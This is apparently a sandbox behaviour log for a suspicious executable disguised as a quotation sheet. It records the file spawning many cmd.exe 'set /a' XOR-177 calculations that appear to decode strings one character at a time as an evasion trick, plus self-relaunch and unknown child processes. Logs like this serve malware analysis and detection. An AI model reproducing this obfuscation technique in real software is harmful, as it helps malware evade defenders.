Source: unknown Process created: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177" Jump to behavior
